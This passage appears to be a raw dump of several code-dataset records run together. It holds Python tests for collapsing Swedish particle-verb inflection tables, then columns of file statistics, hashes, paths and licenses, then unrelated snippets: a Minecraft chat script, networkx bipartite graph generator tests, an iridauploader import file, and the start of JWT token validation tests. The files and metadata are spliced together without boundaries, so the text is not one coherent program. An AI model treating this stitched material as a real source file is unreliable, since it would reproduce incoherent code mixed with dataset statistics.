"bort+1+de",
"1+des bort",
"bort+1+des",
],
["gallra"],
1,
0,
],
[
("msd", "pres ind aktiv"),
("msd", "pres ind s-form"),
("msd", "pret ind aktiv"),
("msd", "pret ind s-form"),
("msd", "imper"),
("msd", "inf aktiv"),
("msd", "inf s-form"),
("msd", "sup aktiv"),
("msd", "sup s-form"),
("msd", "pres_part nom"),
("msd", "pres_part gen"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl gen"),
("msd", "pret_part def pl gen"),
],
),
]
paradigmlist = _collapse_tables(filtered_tables)
assert len(paradigmlist) == 1
def test_transient2():
filtered_tables = [
(
"sopar bort",
("msd", "pres ind aktiv"),
[
[
"sopar bort",
"sopas bort",
"sopade bort",
"sopades bort",
"sopa bort",
"sopa bort",
"sopas bort",
"sopat bort",
"sopats bort",
"sopande bort",
"sopandes bort",
"sopad bort",
"bortsopad",
"sopads bort",
"bortsopads",
"sopat bort",
"bortsopat",
"sopats bort",
"bortsopats",
"sopade bort",
"bortsopade",
"sopades bort",
"bortsopades",
"sopade bort",
"bortsopade",
"sopades bort",
"bortsopades",
"sopade bort",
"bortsopade",
"sopades bort",
"bortsopades",
"sopade bort",
"bortsopade",
"sopades bort",
"bortsopades",
],
(
"[sopa]r bort",
"[sopa]s bort",
"[sopa]de bort",
"[sopa]des bort",
"[sopa] bort",
"[sopa] bort",
"[sopa]s bort",
"[sopa]t bort",
"[sopa]ts bort",
"[sopa]nde bort",
"[sopa]ndes bort",
"[sopa]d bort",
"bort[sopa]d",
"[sopa]ds bort",
"bort[sopa]ds",
"[sopa]t bort",
"bort[sopa]t",
"[sopa]ts bort",
"bort[sopa]ts",
"[sopa]de bort",
"bort[sopa]de",
"[sopa]des bort",
"bort[sopa]des",
"[sopa]de bort",
"bort[sopa]de",
"[sopa]des bort",
"bort[sopa]des",
"[sopa]de bort",
"bort[sopa]de",
"[sopa]des bort",
"bort[sopa]des",
"[sopa]de bort",
"bort[sopa]de",
"[sopa]des bort",
"bort[sopa]des",
),
[
"1+r bort",
"1+s bort",
"1+de bort",
"1+des bort",
"1+ bort",
"1+ bort",
"1+s bort",
"1+t bort",
"1+ts bort",
"1+nde bort",
"1+ndes bort",
"1+d bort",
"bort+1+d",
"1+ds bort",
"bort+1+ds",
"1+t bort",
"bort+1+t",
"1+ts bort",
"bort+1+ts",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
],
["sopa"],
1,
0,
],
[
("msd", "pres ind aktiv"),
("msd", "pres ind s-form"),
("msd", "pret ind aktiv"),
("msd", "pret ind s-form"),
("msd", "imper"),
("msd", "inf aktiv"),
("msd", "inf s-form"),
("msd", "sup aktiv"),
("msd", "sup s-form"),
("msd", "pres_part nom"),
("msd", "pres_part gen"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl gen"),
("msd", "pret_part def pl gen"),
],
),
(
"jagar bort",
("msd", "pres ind aktiv"),
[
[
"jagar bort",
"jagas bort",
"jagade bort",
"jagades bort",
"jaga bort",
"jaga bort",
"jagas bort",
"jagat bort",
"jagats bort",
"jagande bort",
"jagandes bort",
"jagad bort",
"bortjagad",
"jagads bort",
"bortjagads",
"jagat bort",
"bortjagat",
"jagats bort",
"bortjagats",
"jagade bort",
"bortjagade",
"jagades bort",
"bortjagades",
"jagade bort",
"bortjagade",
"jagades bort",
"bortjagades",
"jagade bort",
"bortjagade",
"jagades bort",
"bortjagades",
"jagade bort",
"bortjagade",
"jagades bort",
"bortjagades",
],
(
"jagar [bort]",
"jagas [bort]",
"jagade [bort]",
"jagades [bort]",
"jaga [bort]",
"jaga [bort]",
"jagas [bort]",
"jagat [bort]",
"jagats [bort]",
"jagande [bort]",
"jagandes [bort]",
"jagad [bort]",
"[bort]jagad",
"jagads [bort]",
"[bort]jagads",
"jagat [bort]",
"[bort]jagat",
"jagats [bort]",
"[bort]jagats",
"jagade [bort]",
"[bort]jagade",
"jagades [bort]",
"[bort]jagades",
"jagade [bort]",
"[bort]jagade",
"jagades [bort]",
"[bort]jagades",
"jagade [bort]",
"[bort]jagade",
"jagades [bort]",
"[bort]jagades",
"jagade [bort]",
"[bort]jagade",
"jagades [bort]",
"[bort]jagades",
),
[
"jagar +1",
"jagas +1",
"jagade +1",
"jagades +1",
"jaga +1",
"jaga +1",
"jagas +1",
"jagat +1",
"jagats +1",
"jagande +1",
"jagandes +1",
"jagad +1",
"1+jagad",
"jagads +1",
"1+jagads",
"jagat +1",
"1+jagat",
"jagats +1",
"1+jagats",
"jagade +1",
"1+jagade",
"jagades +1",
"1+jagades",
"jagade +1",
"1+jagade",
"jagades +1",
"1+jagades",
"jagade +1",
"1+jagade",
"jagades +1",
"1+jagades",
"jagade +1",
"1+jagade",
"jagades +1",
"1+jagades",
],
["bort"],
1,
0,
],
[
("msd", "pres ind aktiv"),
("msd", "pres ind s-form"),
("msd", "pret ind aktiv"),
("msd", "pret ind s-form"),
("msd", "imper"),
("msd", "inf aktiv"),
("msd", "inf s-form"),
("msd", "sup aktiv"),
("msd", "sup s-form"),
("msd", "pres_part nom"),
("msd", "pres_part gen"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl gen"),
("msd", "pret_part def pl gen"),
],
),
(
"kollrar bort",
("msd", "pres ind aktiv"),
[
[
"kollrar bort",
"kollras bort",
"kollrade bort",
"kollrades bort",
"kollra bort",
"kollra bort",
"kollras bort",
"kollrat bort",
"kollrats bort",
"kollrande bort",
"kollrandes bort",
"kollrad bort",
"bortkollrad",
"kollrads bort",
"bortkollrads",
"kollrat bort",
"bortkollrat",
"kollrats bort",
"bortkollrats",
"kollrade bort",
"bortkollrade",
"kollrades bort",
"bortkollrades",
"kollrade bort",
"bortkollrade",
"kollrades bort",
"bortkollrades",
"kollrade bort",
"bortkollrade",
"kollrades bort",
"bortkollrades",
"kollrade bort",
"bortkollrade",
"kollrades bort",
"bortkollrades",
],
(
"[kollra]r bort",
"[kollra]s bort",
"[kollra]de bort",
"[kollra]des bort",
"[kollra] bort",
"[kollra] bort",
"[kollra]s bort",
"[kollra]t bort",
"[kollra]ts bort",
"[kollra]nde bort",
"[kollra]ndes bort",
"[kollra]d bort",
"bort[kollra]d",
"[kollra]ds bort",
"bort[kollra]ds",
"[kollra]t bort",
"bort[kollra]t",
"[kollra]ts bort",
"bort[kollra]ts",
"[kollra]de bort",
"bort[kollra]de",
"[kollra]des bort",
"bort[kollra]des",
"[kollra]de bort",
"bort[kollra]de",
"[kollra]des bort",
"bort[kollra]des",
"[kollra]de bort",
"bort[kollra]de",
"[kollra]des bort",
"bort[kollra]des",
"[kollra]de bort",
"bort[kollra]de",
"[kollra]des bort",
"bort[kollra]des",
),
[
"1+r bort",
"1+s bort",
"1+de bort",
"1+des bort",
"1+ bort",
"1+ bort",
"1+s bort",
"1+t bort",
"1+ts bort",
"1+nde bort",
"1+ndes bort",
"1+d bort",
"bort+1+d",
"1+ds bort",
"bort+1+ds",
"1+t bort",
"bort+1+t",
"1+ts bort",
"bort+1+ts",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
],
["kollra"],
1,
0,
],
[
("msd", "pres ind aktiv"),
("msd", "pres ind s-form"),
("msd", "pret ind aktiv"),
("msd", "pret ind s-form"),
("msd", "imper"),
("msd", "inf aktiv"),
("msd", "inf s-form"),
("msd", "sup aktiv"),
("msd", "sup s-form"),
("msd", "pres_part nom"),
("msd", "pres_part gen"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl gen"),
("msd", "pret_part def pl gen"),
],
),
(
"gallrar bort",
("msd", "pres ind aktiv"),
[
[
"gallrar bort",
"gallras bort",
"gallrade bort",
"gallrades bort",
"gallra bort",
"gallra bort",
"gallras bort",
"gallrat bort",
"gallrats bort",
"gallrande bort",
"gallrandes bort",
"gallrad bort",
"bortgallrad",
"gallrads bort",
"bortgallrads",
"gallrat bort",
"bortgallrat",
"gallrats bort",
"bortgallrats",
"gallrade bort",
"bortgallrade",
"gallrades bort",
"bortgallrades",
"gallrade bort",
"bortgallrade",
"gallrades bort",
"bortgallrades",
"gallrade bort",
"bortgallrade",
"gallrades bort",
"bortgallrades",
"gallrade bort",
"bortgallrade",
"gallrades bort",
"bortgallrades",
],
(
"[gallra]r bort",
"[gallra]s bort",
"[gallra]de bort",
"[gallra]des bort",
"[gallra] bort",
"[gallra] bort",
"[gallra]s bort",
"[gallra]t bort",
"[gallra]ts bort",
"[gallra]nde bort",
"[gallra]ndes bort",
"[gallra]d bort",
"bort[gallra]d",
"[gallra]ds bort",
"bort[gallra]ds",
"[gallra]t bort",
"bort[gallra]t",
"[gallra]ts bort",
"bort[gallra]ts",
"[gallra]de bort",
"bort[gallra]de",
"[gallra]des bort",
"bort[gallra]des",
"[gallra]de bort",
"bort[gallra]de",
"[gallra]des bort",
"bort[gallra]des",
"[gallra]de bort",
"bort[gallra]de",
"[gallra]des bort",
"bort[gallra]des",
"[gallra]de bort",
"bort[gallra]de",
"[gallra]des bort",
"bort[gallra]des",
),
[
"1+r bort",
"1+s bort",
"1+de bort",
"1+des bort",
"1+ bort",
"1+ bort",
"1+s bort",
"1+t bort",
"1+ts bort",
"1+nde bort",
"1+ndes bort",
"1+d bort",
"bort+1+d",
"1+ds bort",
"bort+1+ds",
"1+t bort",
"bort+1+t",
"1+ts bort",
"bort+1+ts",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
"1+de bort",
"bort+1+de",
"1+des bort",
"bort+1+des",
],
["gallra"],
1,
0,
],
[
("msd", "pres ind aktiv"),
("msd", "pres ind s-form"),
("msd", "pret ind aktiv"),
("msd", "pret ind s-form"),
("msd", "imper"),
("msd", "inf aktiv"),
("msd", "inf s-form"),
("msd", "sup aktiv"),
("msd", "sup s-form"),
("msd", "pres_part nom"),
("msd", "pres_part gen"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u nom"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg u gen"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n nom"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef sg n gen"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl nom"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part indef pl gen"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc nom"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg no_masc gen"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc nom"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def sg masc gen"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl nom"),
("msd", "pret_part def pl gen"),
("msd", "pret_part def pl gen"),
],
),
]
paradigmlist = _collapse_tables(filtered_tables)
assert len(paradigmlist) == 2
| 35.859124
| 86
| 0.317341
| 4,146
| 49,127
| 3.693439
| 0.034973
| 0.095083
| 0.137922
| 0.087769
| 0.958205
| 0.954548
| 0.950369
| 0.950369
| 0.946647
| 0.946647
| 0
| 0.015742
| 0.548721
| 49,127
| 1,369
| 87
| 35.885318
| 0.674966
| 0
| 0
| 0.91796
| 0
| 0
| 0.341686
| 0
| 0
| 0
| 0
| 0
| 0.00813
| 1
| 0.002956
| false
| 0
| 0.000739
| 0
| 0.003695
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
62f1f956df117f937ab1becfb36b41bfd62406cd
| 116
|
py
|
Python
|
001_PrintName/printName.py
|
kmranrg/CodeInMinecraftWithAnurag
|
982e408f57a58d767b4f636240c627bffad6de21
|
[
"BSD-3-Clause"
] | null | null | null |
001_PrintName/printName.py
|
kmranrg/CodeInMinecraftWithAnurag
|
982e408f57a58d767b4f636240c627bffad6de21
|
[
"BSD-3-Clause"
] | null | null | null |
001_PrintName/printName.py
|
kmranrg/CodeInMinecraftWithAnurag
|
982e408f57a58d767b4f636240c627bffad6de21
|
[
"BSD-3-Clause"
] | null | null | null |
def on_on_chat():
blocks.print("ANURAG", BLUE_WOOL, pos(0, 0, 0), EAST)
player.on_chat("printName", on_on_chat)
| 29
| 57
| 0.698276
| 21
| 116
| 3.571429
| 0.619048
| 0.24
| 0.213333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029412
| 0.12069
| 116
| 3
| 58
| 38.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0.12931
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
62f356446f0ff7235ea9396bdda591d503010db9
| 109
|
py
|
Python
|
codes/style/training/Discriminators/__init__.py
|
liweileev/SOMGAN
|
11ec1c01b288a00f5a49906b9e683e67d3509701
|
[
"MIT"
] | null | null | null |
codes/style/training/Discriminators/__init__.py
|
liweileev/SOMGAN
|
11ec1c01b288a00f5a49906b9e683e67d3509701
|
[
"MIT"
] | null | null | null |
codes/style/training/Discriminators/__init__.py
|
liweileev/SOMGAN
|
11ec1c01b288a00f5a49906b9e683e67d3509701
|
[
"MIT"
] | null | null | null |
'''
Author: Liweileev
Date: 2022-01-04 23:12:38
LastEditors: Liweileev
LastEditTime: 2022-01-04 23:12:38
'''
| 15.571429
| 33
| 0.724771
| 18
| 109
| 4.388889
| 0.611111
| 0.151899
| 0.202532
| 0.253165
| 0.35443
| 0.35443
| 0
| 0
| 0
| 0
| 0
| 0.28866
| 0.110092
| 109
| 6
| 34
| 18.166667
| 0.525773
| 0.917431
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7ef013470d26992a1fe799f4503de6d82ab759e
| 7,161
|
py
|
Python
|
lib/python2.7/site-packages/networkx/algorithms/bipartite/tests/test_generators.py
|
nishaero/wifi-userseg-ryu
|
1132f2c813b79eff755bdd1a9e73e7ad3980af7c
|
[
"Apache-2.0"
] | 15
|
2018-04-26T08:17:18.000Z
|
2021-03-05T08:44:13.000Z
|
lib/python2.7/site-packages/networkx/algorithms/bipartite/tests/test_generators.py
|
nishaero/wifi-userseg-ryu
|
1132f2c813b79eff755bdd1a9e73e7ad3980af7c
|
[
"Apache-2.0"
] | null | null | null |
lib/python2.7/site-packages/networkx/algorithms/bipartite/tests/test_generators.py
|
nishaero/wifi-userseg-ryu
|
1132f2c813b79eff755bdd1a9e73e7ad3980af7c
|
[
"Apache-2.0"
] | 6
|
2018-04-12T15:49:27.000Z
|
2022-01-27T12:34:50.000Z
|
#!/usr/bin/env python
from nose.tools import *
from networkx import *
from networkx.algorithms.bipartite.generators import *
"""Generators - Bipartite
----------------------
"""
class TestGeneratorsBipartite():
def test_complete_bipartite_graph(self):
G=complete_bipartite_graph(0,0)
assert_true(is_isomorphic( G, null_graph() ))
for i in [1, 5]:
G=complete_bipartite_graph(i,0)
assert_true(is_isomorphic( G, empty_graph(i) ))
G=complete_bipartite_graph(0,i)
assert_true(is_isomorphic( G, empty_graph(i) ))
G=complete_bipartite_graph(2,2)
assert_true(is_isomorphic( G, cycle_graph(4) ))
G=complete_bipartite_graph(1,5)
assert_true(is_isomorphic( G, star_graph(5) ))
G=complete_bipartite_graph(5,1)
assert_true(is_isomorphic( G, star_graph(5) ))
# complete_bipartite_graph(m1,m2) is a connected graph with
# m1+m2 nodes and m1*m2 edges
for m1, m2 in [(5, 11), (7, 3)]:
G=complete_bipartite_graph(m1,m2)
assert_equal(number_of_nodes(G), m1 + m2)
assert_equal(number_of_edges(G), m1 * m2)
assert_raises(networkx.exception.NetworkXError,
complete_bipartite_graph, 7, 3, create_using=DiGraph())
mG=complete_bipartite_graph(7, 3, create_using=MultiGraph())
assert_equal(mG.edges(), G.edges())
def test_configuration_model(self):
aseq=[3,3,3,3]
bseq=[2,2,2,2,2]
assert_raises(networkx.exception.NetworkXError,
configuration_model, aseq, bseq)
aseq=[3,3,3,3]
bseq=[2,2,2,2,2,2]
G=configuration_model(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,2,2,2]
bseq=[3,3,3,3]
G=configuration_model(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,1,1,1]
bseq=[3,3,3]
G=configuration_model(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[1, 1, 1, 2, 2, 2, 3, 3, 3])
GU=project(Graph(G),range(len(aseq)))
assert_equal(GU.number_of_nodes(), 6)
GD=project(Graph(G),range(len(aseq),len(aseq)+len(bseq)))
assert_equal(GD.number_of_nodes(), 3)
assert_raises(networkx.exception.NetworkXError,
configuration_model, aseq, bseq,
create_using=DiGraph())
def test_havel_hakimi_graph(self):
aseq=[3,3,3,3]
bseq=[2,2,2,2,2]
assert_raises(networkx.exception.NetworkXError,
havel_hakimi_graph, aseq, bseq)
bseq=[2,2,2,2,2,2]
G=havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,2,2,2]
bseq=[3,3,3,3]
G=havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
GU=project(Graph(G),range(len(aseq)))
assert_equal(GU.number_of_nodes(), 6)
GD=project(Graph(G),range(len(aseq),len(aseq)+len(bseq)))
assert_equal(GD.number_of_nodes(), 4)
assert_raises(networkx.exception.NetworkXError,
havel_hakimi_graph, aseq, bseq,
create_using=DiGraph())
def test_reverse_havel_hakimi_graph(self):
aseq=[3,3,3,3]
bseq=[2,2,2,2,2]
assert_raises(networkx.exception.NetworkXError,
reverse_havel_hakimi_graph, aseq, bseq)
bseq=[2,2,2,2,2,2]
G=reverse_havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,2,2,2]
bseq=[3,3,3,3]
G=reverse_havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,1,1,1]
bseq=[3,3,3]
G=reverse_havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[1, 1, 1, 2, 2, 2, 3, 3, 3])
GU=project(Graph(G),range(len(aseq)))
assert_equal(GU.number_of_nodes(), 6)
GD=project(Graph(G),range(len(aseq),len(aseq)+len(bseq)))
assert_equal(GD.number_of_nodes(), 3)
assert_raises(networkx.exception.NetworkXError,
reverse_havel_hakimi_graph, aseq, bseq,
create_using=DiGraph())
def test_alternating_havel_hakimi_graph(self):
aseq=[3,3,3,3]
bseq=[2,2,2,2,2]
assert_raises(networkx.exception.NetworkXError,
alternating_havel_hakimi_graph, aseq, bseq)
bseq=[2,2,2,2,2,2]
G=alternating_havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,2,2,2]
bseq=[3,3,3,3]
G=alternating_havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,1,1,1]
bseq=[3,3,3]
G=alternating_havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[1, 1, 1, 2, 2, 2, 3, 3, 3])
GU=project(Graph(G),range(len(aseq)))
assert_equal(GU.number_of_nodes(), 6)
GD=project(Graph(G),range(len(aseq),len(aseq)+len(bseq)))
assert_equal(GD.number_of_nodes(), 3)
assert_raises(networkx.exception.NetworkXError,
alternating_havel_hakimi_graph, aseq, bseq,
create_using=DiGraph())
def test_preferential_attachment(self):
aseq=[3,2,1,1]
G=preferential_attachment_graph(aseq,0.5)
assert_raises(networkx.exception.NetworkXError,
preferential_attachment_graph, aseq, 0.5,
create_using=DiGraph())
def test_random_graph(self):
n=10
m=20
G=random_graph(n,m,0.9)
assert_equal(len(G),30)
assert_true(is_bipartite(G))
X,Y=nx.algorithms.bipartite.sets(G)
assert_equal(set(range(n)),X)
assert_equal(set(range(n,n+m)),Y)
def test_random_graph(self):
n=10
m=20
G=random_graph(n,m,0.9,directed=True)
assert_equal(len(G),30)
assert_true(is_bipartite(G))
X,Y=nx.algorithms.bipartite.sets(G)
assert_equal(set(range(n)),X)
assert_equal(set(range(n,n+m)),Y)
def test_gnmk_random_graph(self):
n = 10
m = 20
edges = 100
G = gnmk_random_graph(n, m, edges)
assert_equal(len(G),30)
assert_true(is_bipartite(G))
X,Y=nx.algorithms.bipartite.sets(G)
print(X)
assert_equal(set(range(n)),X)
assert_equal(set(range(n,n+m)),Y)
assert_equal(edges, len(G.edges()))
| 34.263158
| 77
| 0.559978
| 1,022
| 7,161
| 3.738748
| 0.090998
| 0.057053
| 0.064381
| 0.058623
| 0.866789
| 0.802669
| 0.766553
| 0.736195
| 0.71866
| 0.705051
| 0
| 0.062648
| 0.293395
| 7,161
| 208
| 78
| 34.427885
| 0.69249
| 0.014942
| 0
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.314815
| 1
| 0.055556
| false
| 0
| 0.018519
| 0
| 0.080247
| 0.006173
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c532e0d27da4e6220090f4869bde7412c6e0e585
| 233
|
py
|
Python
|
iridauploader/progress/__init__.py
|
dfornika/irida-uploader
|
0d855433bf5b567ff1e63501950fdc145b488742
|
[
"Apache-2.0"
] | null | null | null |
iridauploader/progress/__init__.py
|
dfornika/irida-uploader
|
0d855433bf5b567ff1e63501950fdc145b488742
|
[
"Apache-2.0"
] | null | null | null |
iridauploader/progress/__init__.py
|
dfornika/irida-uploader
|
0d855433bf5b567ff1e63501950fdc145b488742
|
[
"Apache-2.0"
] | null | null | null |
from iridauploader.progress.upload_status import get_directory_status, write_directory_status
from iridauploader.progress.upload_signals import signal_worker, send_progress, ProgressData
from iridauploader.progress import exceptions
| 58.25
| 93
| 0.901288
| 28
| 233
| 7.214286
| 0.535714
| 0.252475
| 0.371287
| 0.306931
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064378
| 233
| 3
| 94
| 77.666667
| 0.926606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c562a80d4df9620e55a1f4a10a5e77efc0ba8a61
| 15,568
|
py
|
Python
|
tests/test_module.py
|
Colin-b/oauth2helper
|
52ddc1509a2fb7de2c662c4d6f8814f0cd9fea56
|
[
"MIT"
] | 1
|
2019-12-02T14:41:47.000Z
|
2019-12-02T14:41:47.000Z
|
tests/test_module.py
|
Colin-b/oauth2helper
|
52ddc1509a2fb7de2c662c4d6f8814f0cd9fea56
|
[
"MIT"
] | 1
|
2020-04-20T13:46:59.000Z
|
2020-04-20T13:46:59.000Z
|
tests/test_module.py
|
Colin-b/oauth2helper
|
52ddc1509a2fb7de2c662c4d6f8814f0cd9fea56
|
[
"MIT"
] | null | null | null |
import pytest
import jwt
from responses import RequestsMock
import oauth2helper
def test_token_cannot_be_decoded_if_not_provided():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.decode(None)
assert str(exception_info.value) == "JWT Token is mandatory."
def test_token_cannot_be_validated_if_not_provided():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.validate(None, "")
assert str(exception_info.value) == "JWT Token is mandatory."
def test_empty_token_cannot_be_decoded():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.decode("")
assert str(exception_info.value) == "JWT Token is mandatory."
def test_empty_token_cannot_be_validated():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.validate("", "")
assert str(exception_info.value) == "JWT Token is mandatory."
def test_invalid_token_cannot_be_decoded():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.decode("Invalid token")
assert (
str(exception_info.value)
== "Invalid JWT Token (header, body and signature must be separated by dots)."
)
def test_invalid_token_cannot_be_validated():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.validate("Invalid token", "")
assert (
str(exception_info.value)
== "Invalid JWT Token (header, body and signature must be separated by dots)."
)
def test_missing_upn():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.user_name({})
